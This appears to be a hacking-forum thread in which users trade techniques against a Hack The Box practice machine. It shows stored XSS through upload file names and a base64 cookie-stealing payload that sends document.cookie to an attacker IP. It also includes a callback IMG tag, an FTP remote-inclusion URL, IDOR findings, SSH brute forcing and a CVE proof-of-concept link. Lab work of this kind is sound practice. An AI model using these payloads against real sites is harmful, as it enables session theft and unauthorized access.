Posts: 219
Threads: 14
Joined: Apr 2024
I user it on both ssh ports also .. Lol this machine is hard not medium This forum account is currently banned. Ban Length: Permanent (N/A Remaining) Ban Reason:
Asking for rep is not allowed
Posts: 67
Threads: 3
Joined: Jul 2024
yeah, i looked into a few options for command replacement as well or chaining the ping command with something else, not much luck so far but maybe its possible
i tried the first bit of rockyou for ssh brute force as well
Posts: 124
Threads: 1
Joined: Apr 2024
(Aug 03, 2024, 09:41 PM)Anaunimans Wrote: Idor in creating comments.
idor in deleting files ,
stored XSS in file name
try <svg onload=alert()>.zip
Content-Disposition: form-data; name="attachment"; filename="<svg onload=alert()>.zip"
Content-Type: application/zip
xss works
i taught there's might be someone checking loading ticket 1-5 but no results.
i tried stealing cookie
<svg onload=eval(atob('dmFyIGk9bmV3IEltYWdlKCk7IGkuc3JjPSJodHRwOi8vMTAuMTAuMTYuNDIvP2Nvb2tpZT0iK2J0b2EoZG9jdW1lbnQuY29va2llKQo='))>.zip
didnt work.
using fetch i can steal my own cookie but it's unlikely anyone is looking into these tickets
Posts: 219
Threads: 14
Joined: Apr 2024
Aug 03, 2024, 10:19 PM
(This post was last modified: Aug 03, 2024, 10:20 PM by osamy7593.)
anyone wanna join my teamin htb DM me the team created 3 days ago and our rank
Is 60 ... Minimal required rank pro hacker .. If u been accepted i will enter u
In our disc server .. When DM send ur htb username This forum account is currently banned. Ban Length: Permanent (N/A Remaining) Ban Reason:
Asking for rep is not allowed
Posts: 67
Threads: 3
Joined: Jul 2024
(Aug 03, 2024, 10:03 PM)bestmajor Wrote: (Aug 03, 2024, 10:01 PM)osamy7593 Wrote: anyone tried zzinter bruteforce on password ?
Used hydra for brute-forcing web pw... no success
(Aug 03, 2024, 10:12 PM)jsvensson Wrote: (Aug 03, 2024, 09:41 PM)Anaunimans Wrote: Idor in creating comments.
idor in deleting files ,
stored XSS in file name
try <svg onload=alert()>.zip
Content-Disposition: form-data; name="attachment"; filename="<svg onload=alert()>.zip"
Content-Type: application/zip
xss works
i taught there's might be someone checking loading ticket 1-5 but no results.
i tried stealing cookie
<svg onload=eval(atob('dmFyIGk9bmV3IEltYWdlKCk7IGkuc3JjPSJodHRwOi8vMTAuMTAuMTYuNDIvP2Nvb2tpZT0iK2J0b2EoZG9jdW1lbnQuY29va2llKQo='))>.zip
didnt work.
using fetch i can steal my own cookie but it's unlikely anyone is looking into these tickets
i think the idea of stealing cookie for user who made the tickets on teh admin panel is smart but not sure how to accomplish that
Posts: 19
Threads: 1
Joined: Jun 2024
I was able to use this to get the .zip file XSS to ping back to my web server, so I put one in each of the tickets to see if it'd at least come back before modifying it to grab the cookie, but nothing so far. Uses HTML entity encoding since the forward slashes seem to break it.
<IMG SRC=//10.10.x.x:x+'document.cookie'>
Posts: 33
Threads: 3
Joined: Sep 2023
Aug 03, 2024, 11:05 PM
(This post was last modified: Aug 03, 2024, 11:07 PM by andy1.)
https://github.com/M507/CVE-2021-23017-PoC haft to be able to send spoofed dns request to nginx not sure if can use this
https://nvd.nist.gov/vuln/detail/CVE-2021-23017
potential udp port 68 found in udp scan This forum account is currently banned. Ban Length: Permanent (N/A Remaining) Ban Reason: Asking for reputation
Posts: 44
Threads: 0
Joined: Apr 2024
FTP protocol gives some feedback but remote includes are disabled
http://itrc.ssg.htb/?page=ftp://xxx:yyy@ip:port/fileThis forum account is currently banned. Ban Length: Permanent (N/A Remaining) Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.
Posts: 44
Threads: 0
Joined: Apr 2024
(Aug 03, 2024, 11:13 PM)insect1285 Wrote: I wonder if because the hash function is always the same, if we can reference an upload based on a guessed hash of a file name for the other tickets. Maybe `malware.zip` and find the hash - then try `/uploads/<malware hash>.zip`?
Anyone looked into that yet?
its not the filename hash bro its a checksum over the content This forum account is currently banned. Ban Length: Permanent (N/A Remaining) Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.
Posts: 12
Threads: 0
Joined: Jun 2024
(Aug 03, 2024, 08:08 PM)spamdegratis5 Wrote: I was thinking the same, if you try to access ticket page without id parameter, you get this error
<div class="main"><br />
<b>Warning</b>: Undefined array key "id" in <b>/var/www/itrc/ticket.php</b> on line <b>5</b><br />
<script>window.location = '/';</script>
Also there is a db.php file
Edit: oh you meant create_comment, it seems like vulnerable to IDOR, at least the response is {"status":"success"}
(Aug 03, 2024, 11:26 PM)insect1285 Wrote: Closed tickets hint at other servers. Maybe need to track those down? Or find their specific pages?
```
Ticket ID
Subject
Status
1
Need SSH Access to HR Server
closed
2
Decommission ITRC SSH Certificate
closed
4
Please provision access to marketing servers
closed
```
How were you able to get the data of the closed ones?
I just got back on, but earlier before I was able to close all the tickets regardless of ID or ownership, tested it with separate accounts. As well as the comment on whatever ID you like as already mentioned prior in this thread.
|